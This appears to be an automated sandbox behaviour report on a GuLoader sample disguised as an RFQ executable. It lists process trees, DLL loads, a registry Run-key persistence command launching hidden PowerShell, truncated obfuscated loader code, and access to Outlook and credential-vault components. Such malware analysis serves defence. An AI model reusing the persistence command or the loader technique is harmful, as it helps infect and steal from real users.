Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Minken.exe "C:\Users\user\AppData\Local\Temp\Minken.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1684 --field-trial-handle=1844,i,13896805619792055621,4904984186317892360,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=2052,i,55276660867092157,14850349657690875544,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)"	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\fc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: RFQ-LOTUS 2024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: fc.pdb source: Minken.exe, 0000000C.00000003.2828157923.0000000007119000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2923889693.00000000070CE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: fc.pdbGCTL source: Minken.exe, 0000000C.00000003.2828157923.0000000007119000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2923889693.00000000070CE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: Minken.exe, 0000000C.00000001.2418106236.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.2593503966.0000000007B47000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Minken.exe, 0000000C.00000003.2734555224.0000000022DC9000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmp, Minken.exe, 0000000C.00000003.2737199263.0000000022F77000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Minken.exe, Minken.exe, 0000000C.00000003.2734555224.0000000022DC9000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmp, Minken.exe, 0000000C.00000003.2737199263.0000000022F77000.00000004.00000020.00020000.00000000.sdmp, fc.exe
Source:	Binary string: mshtml.pdbUGP source: Minken.exe, 0000000C.00000001.2418106236.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb5q source: powershell.exe, 00000001.00000002.2596755674.0000000008C70000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.2597157213.000000000B490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Groenligt $observatrerne $Oarlock), (Seroprognosis @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Markprver = [AppDomain]::CurrentDomain.GetAssemblies()$g
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Bathyscaph)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Nummereringsmetodernes, $false).DefineType($Mi

Obfuscated command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
